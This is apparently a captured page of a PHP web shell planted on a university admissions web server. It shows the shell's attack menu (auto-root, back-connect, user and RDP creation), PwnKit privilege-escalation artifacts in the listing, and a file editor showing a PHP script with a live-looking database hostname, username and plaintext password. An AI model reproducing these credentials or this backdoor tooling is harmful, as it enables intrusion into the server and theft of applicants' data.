Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.12.233
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
bcu /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
meritlist
[ DIR ]
drwxrwxr-x
meritlist_final
[ DIR ]
drwxrwxr-x
meritlist_final_2
[ DIR ]
drwxrwxrwx
other_docs
[ DIR ]
drwxrwxr-x
.bcu.php
3.61
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
1-Year-Fee-Notification-Affila...
518.4
KB
-rwxrwxrwx
1-Year-Fee-Notification-BCU-De...
586.53
KB
-rwxrwxrwx
COURSES_OFFERED_ARTS.pdf
1.69
MB
-rwxrwxrwx
COURSES_OFFERED_ARTS_old.pdf
1.69
MB
-rwxrwxrwx
Eligibility_Criteria_For_Admis...
21.2
MB
-rwxrwxrwx
MainPage.html
52.32
KB
-rwxrwxrwx
PG 3rd round counselling vacan...
5.36
MB
-rwxrwxrwx
PG-admission-notification-for-...
757.44
KB
-rwxrwxrwx
PG_Courses_offered_in_Affiliat...
13.14
MB
-rwxrwxrwx
Scan Dec 8, 2020 (2).pdf
2.74
MB
-rwxrwxrwx
Scan Dec 8, 2020.pdf
1.48
MB
-rwxrwxrwx
add-course-payment.html
692
B
-rwxrwxrwx
add-course.html
1.23
KB
-rwxrwxrwx
app-status.html
3.39
KB
-rwxrwxrwx
dat.json
5.03
KB
-rwxrwxrwx
ent-application.html
87.12
KB
-rwxrwxrwx
ent-application05.10.2020.html
83.65
KB
-rwxrwxrwx
forgotPassword.html
5.11
KB
-rwxrwxrwx
genRankPrio.php
894
B
-rwxrwxrwx
index.html
8.38
KB
-rwxrwxrwx
index_adm.html
5.42
KB
-rwxrwxrwx
instruction.html
10.69
KB
-rwxrwxrwx
login.html
7.22
KB
-rwxrwxrwx
make-payment.html
452
B
-rwxrwxrwx
merit_list.php
2.03
KB
-rwxrwxrwx
merit_list_2.php
1.91
KB
-rwxrwxrwx
merit_list_final.php
1.93
KB
-rw-rw-r--
merit_list_final_2.php
1.96
KB
-rw-rw-r--
mock-seat-allotment.html
608
B
-rwxrwxrwx
option-entry.html
1.54
KB
-rwxrwxrwx
pg-forgotPassword.html
4.1
KB
-rwxrwxrwx
pg-sign-up.html
7.81
KB
-rwxrwxrwx
pg_instruction.html
9.14
KB
-rwxrwxrwx
pgadm.html
67.76
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
seat-allotment.html
1.08
KB
-rwxrwxrwx
seatAllot.php
6.75
KB
-rwxrwxrwx
sign-up.html
7.96
KB
-rwxrwxrwx
support.html
4.76
KB
-rwxrwxrwx
upload_file.php
787
B
-rwxrwxrwx
upload_file_pg.php
746
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : merit_list_2.php
<?php $servername = "logisys.cluster-cv9maxyrxjgg.ap-south-1.rds.amazonaws.com"; $username = "admin"; $password = "Logisys2104"; $conn = new mysqli($servername,$username,$password); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $db = "logisys3_bcu"; $query = "SELECT d.fdegree, d.fdescpn, CONCAT('https://bcu.ac.in/uploads/meritlist_2/',d.fdegree,'.pdf') AS link FROM {$db}.entdeg d WHERE ifnull(d.fdeleted,'') <> 'T' and ifnull(flock,'') = 'T' order by forder,d.fdescpn"; $result = mysqli_query($conn, $query); $count = mysqli_num_rows($result); $query1 = "select funivname, date_format(now(), '%d/%m/%Y %r') as fdate from {$db}.control"; // var_dump(expression) $result1 = mysqli_query($conn, $query1); $row1 = mysqli_fetch_assoc($result1); $table = '<center><h1>'.$row1['funivname'].'</h1> <h2>Second Round Merit List</h2> </center> <table style="margin-left:2px;text-align: left;width: 60%;font-size:14px;margin: auto;" align-self="middle" cellspacing="1" cellpadding="5" border="0" align="center" bgcolor="#505151"> <thead> <tr style = "background-color:#8acc51"> <th width="8%"><center>Sl. No.</center></th> <th width="15%"><center>Degree code</center></th> <th><center>Degree Name</center></th> <th width="25%"><center>Merit List</center></th> </tr> </thead>'; $i = 0; if($count > 0) { while($row = mysqli_fetch_assoc($result)) { $table .= "<tr bgcolor='#ffffff' >"; $table .= "<td><center>".++$i."</center></td>"; $table .= "<td><center>".$row['fdegree']."</center></td>"; $table .= "<td>".$row['fdescpn']."</td>"; $table .= "<td><a href='".$row['link']."' target = 'blank'>Click here for Merit List</a></td>"; $table .= "</tr>"; } } else { $table .= "<tr bgcolor='#ffffff' >"; $table .= "<td colspan='4'><center>Merit List Not yet Announced</center></td>"; } echo $table; ?>
Close